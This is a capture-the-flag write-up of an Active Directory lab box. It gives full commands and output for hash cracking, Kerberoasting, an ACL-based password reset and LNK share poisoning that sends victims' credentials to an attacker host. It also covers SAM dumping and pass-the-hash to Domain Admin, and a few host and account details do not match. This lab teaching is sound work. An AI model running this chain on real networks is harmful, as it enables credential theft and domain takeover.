Box: Active Directory (Hack Smarter / OSCP-style) · OS: Windows Server 2022 · Domain: BUILDINGMAGIC.LOCAL · Theme: Web DB leak → Kerberoast → ACL abuse → share poisoning → Pass-the-Hash
BuildingMagic is a full-length Active Directory chain and probably the most satisfying box in this set — it strings together half a dozen classic AD techniques into one clean path from an anonymous web portal all the way to Domain Admin. (It’s Harry Potter–themed, so expect a lot of familiar surnames.)
Recon
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ rustscan -a 10.0.27.163 -- -A
Open 10.0.27.163:53
Open 10.0.27.163:80
Open 10.0.27.163:88
Open 10.0.27.163:135
Open 10.0.27.163:139
Open 10.0.27.163:389
Open 10.0.27.163:445
Open 10.0.27.163:464
Open 10.0.27.163:593
Open 10.0.27.163:636
Open 10.0.27.163:3268
Open 10.0.27.163:3269
Open 10.0.27.163:3389
Open 10.0.27.163:5985
Open 10.0.27.163:8080
Open 10.0.27.163:9389
The interesting parts of the nmap output:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
389/tcp open ldap Microsoft Windows AD LDAP (Domain: BUILDINGMAGIC.LOCAL)
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: BUILDINGMAGIC.LOCAL
|_ Product_Version: 10.0.20348
5985/tcp open http Microsoft HTTPAPI httpd 2.0 # WinRM
8080/tcp open http Werkzeug httpd 3.1.3 (Python 3.13.3)
|_http-title: Building Magic Application Portal
9389/tcp open mc-nmf .NET Message Framing # ADWS
Host script results:
| smb2-security-mode:
|_ Message signing enabled and required
Standard domain-controller port set — with two things worth noting: SMB signing is enabled (so no easy relay), and there’s a web app on 8080. The certs gave me the domain BUILDINGMAGIC.LOCAL and host DC01 — into /etc/hosts they went.
Initial Foothold — leaked database
A null SMB session was allowed but gave up nothing useful:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ nxc smb 10.0.27.163 -u '' -p ''
SMB 10.0.27.163 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:BUILDINGMAGIC.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.163 445 DC01 [+] BUILDINGMAGIC.LOCAL\:
The way in was the Building Magic Application Portal on 8080, which leaked its backend user table — ten employees, each with an MD5 password hash:
id username full_name role password
1 r.widdleton Ron Widdleton Intern Builder c4a21c4d438819d73d24851e7966229c
2 n.bottomsworth Neville Bottomsworth Planner 61ee643c5043eadbcdc6c9d1e3ebd298
3 l.layman Luna Layman Planner 8960516f904051176cc5ef67869de88f
4 c.smith Chen Smith Builder bbd151e24516a48790b2cd5845e7f148
5 d.thomas Dean Thomas Builder 4d14ff3e264f6a9891aa6cea1cfa17cb
6 s.winnigan Samuel Winnigan HR Manager 078576a0569f4e0b758aedf650cb6d9a
7 p.jackson Parvati Jackson Shift Lead eada74b2fa7f5e142ac412d767831b54
8 b.builder Bob Builder Electrician dd4137bab3b52b55f99f18b7cd595448
9 t.ren Theodore Ren Safety Officer bfaf794a81438488e57ee3954c27cd75
10 e.macmillan Ernest Macmillan Surveyor 47d23284395f618bea1959e710bc68ef
I saved the hashes and ran them through hashcat as raw MD5:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
c4a21c4d438819d73d24851e7966229c:lilronron
...
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Recovered........: 1/10 (10.00%) Digests
One fell — r.widdleton : lilronron. The creds validated over SMB and exposed a custom share:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ nxc smb BUILDINGMAGIC.LOCAL -u 'r.widdleton' -p 'lilronron' --shares
SMB 10.0.27.163 445 DC01 [+] BUILDINGMAGIC.LOCAL\r.widdleton:lilronron
SMB 10.0.27.163 445 DC01 Share Permissions Remark
SMB 10.0.27.163 445 DC01 ----- ----------- ------
SMB 10.0.27.163 445 DC01 ADMIN$ Remote Admin
SMB 10.0.27.163 445 DC01 C$ Default share
SMB 10.0.27.163 445 DC01 File-Share Central Repository of Building Magic's files.
SMB 10.0.27.163 445 DC01 IPC$ READ Remote IPC
SMB 10.0.27.163 445 DC01 NETLOGON Logon server share
SMB 10.0.27.163 445 DC01 SYSVOL Logon server share
Domain Enumeration — BloodHound
With a valid account I ran a full BloodHound collection to map the domain:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ nxc ldap 10.0.27.163 -u 'r.widdleton' -p 'lilronron' --bloodhound --collection All --dns-server 10.0.27.163
LDAP 10.0.27.163 389 DC01 [+] BUILDINGMAGIC.LOCAL\r.widdleton:lilronron
LDAP 10.0.27.163 389 DC01 Resolved collection methods: localadmin, group, container, psremote, acl, trusts, session, rdp, objectprops, dcom
LDAP 10.0.27.163 389 DC01 Done in 0M 44S
LDAP 10.0.27.163 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_..._bloodhound.zip
Kerberoasting → r.haggard
BloodHound flagged a Kerberoastable account, so I requested its service ticket:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ sudo impacket-GetUserSPNs buildingmagic.local/r.widdleton:lilronron -dc-ip 10.0.27.163 -request -outputfile kerberoast.hashes
ServicePrincipalName Name PasswordLastSet Delegation
---------------------------------------- --------- -------------------------- ----------
HOGWARTS-DC/r.hagrid.WIZARDING.THM:60111 r.haggard 2025-05-15 17:09:04.002067
That TGS cracked in seconds:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*$4238...87ba0c:rubeushagrid
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Creds: r.haggard : rubeushagrid.
ACL Abuse — targeted password reset
BloodHound showed r.haggard could reset the password of H.POTCH. net rpc made that a one-liner:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ net rpc password "H.POTCH" "cyber@123" -U "buildingmagic.local"/"r.haggard"%"rubeushagrid" -S 10.0.27.163
And the payoff — H.POTCH has READ,WRITE on the File-Share:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ nxc smb 10.0.27.163 -u 'H.POTCH' -p 'cyber@123' --shares
SMB 10.0.27.163 445 DC01 [+] BUILDINGMAGIC.LOCAL\H.POTCH:cyber@123
SMB 10.0.27.163 445 DC01 File-Share READ,WRITE Central Repository of Building Magic's files.
Share Poisoning → h.grangon
A writable file share that other users browse is a forced-authentication goldmine. I planted a malicious shortcut with netexec’s slinky module:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ nxc smb 10.0.27.163 -u 'H.POTCH' -p 'cyber@123' -M slinky -o SERVER=10.200.64.188 SHARES=File-Share NAME=systemd
SLINKY 10.0.27.163 445 DC01 [+] Found writable share: File-Share
SLINKY 10.0.27.163 445 DC01 [+] Created LNK file on the File-Share share
When a user’s Explorer rendered the folder, their machine authenticated to my Responder — yielding h.grangon : magic4ever.
User Flag
h.grangon had WinRM access, so I logged straight in:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ evil-winrm -i DC01.BUILDINGMAGIC.LOCAL -u h.grangon -p 'magic4ever'
*Evil-WinRM* PS C:\Users\h.grangon\Desktop> type user.txt
701b51527b6d4105d9b16b412af2d604
Privilege Escalation → Domain Admin (Pass-the-Hash)
From the h.grangon shell I dumped the local SAM and SYSTEM hives, pulled them down, and extracted the hashes offline:
*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> download sam
*Evil-WinRM* PS C:\Temp> download system
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ impacket-secretsdump -system system -sam sam LOCAL
[*] Target system bootKey: 0xf61a94fb13f74350a1f87f509c8c455c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
That local Administrator NT hash was the finish line — a straight Pass-the-Hash gave code execution as admin, and the root flag:
┌──(kali@kali)-[~/Desktop/Hack Smarter/BuildingMagic]
└─$ nxc smb 10.0.28.232 -u A.flatch -H 520126a03f5d5a8d836f1c4f34ede7ce -x 'type C:\users\Administrator\desktop\root.txt'
SMB 10.0.28.232 445 DC01 [+] BUILDINGMAGIC.LOCAL\A.flatch:520126a03f5d5a8d836f1c4f34ede7ce (Pwn3d!)
SMB 10.0.28.232 445 DC01 [+] Executed command via wmiexec
SMB 10.0.28.232 445 DC01 9557e65743416cfadadfb17f89b8651b
Takeaways
- App DB leaks seed the whole chain. One exposed user table with weak MD5 hashes was the single foothold that unlocked everything else.
- Kerberoasting punishes weak service-account passwords.
rubeushagridshould never have survived rockyou. - BloodHound turns noise into a path. The r.haggard → H.POTCH reset right isn’t obvious by hand — the graph makes it a click.
- Writable shares = forced auth. A share other users browse plus write access equals credential capture via a planted shortcut.
- Defensive fixes: don’t expose backend databases through app endpoints, salt/stretch password storage, enforce strong service-account passwords (or gMSAs), audit dangerous ACLs, and lock down write permissions on shared folders.